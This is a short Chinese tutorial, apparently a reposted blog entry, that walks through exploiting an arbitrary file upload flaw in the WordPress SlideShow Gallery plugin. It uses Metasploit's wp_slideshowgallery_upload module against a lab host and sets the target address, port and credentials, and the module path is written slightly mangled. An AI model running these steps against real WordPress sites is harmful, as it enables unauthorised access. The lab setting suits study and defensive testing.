WordPress实战渗透测试:利用插件(轮播幻灯片)漏洞来进行文件上传(任意文件上传漏洞)

WordPress SlideShow Gallery插件包含绕过过身份验证的任意文件上传漏洞。攻击者可以将任意文件上传到上传文件夹。由于插件使用自己的文件上传机制而不是WordPress API,因此可以上传任何文件类型。利用目标
WordPress的
需求
攻击者:kali Linux
受害者PC:WordPress
打开Kali终端类型  msfconsole
WordPress实战渗透测试:利用插件SlideShow Gallery来进行文件上传(任意文件上传漏洞)
现在输入  exploit use / unix / webapp / wp_slideshowgallery_upload
msf exploit (wp_slideshowgallery_upload)>set targeturi /
msf exploit (wp_slideshowgallery_upload)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (wp_slideshowgallery_upload)>set rport 80
msf exploit (wp_slideshowgallery_upload)>set wp_user user
msf exploit (wp_slideshowgallery_upload)>set wp_password bitnami
msf exploit (wp_slideshowgallery_upload)>exploit    
WordPress实战渗透测试:利用插件SlideShow Gallery来进行文件上传(任意文件上传漏洞)
转载请注明本文链接: http://www.mayidui.net/t2322.html
游客
登录后才可以回帖,登录 或者 注册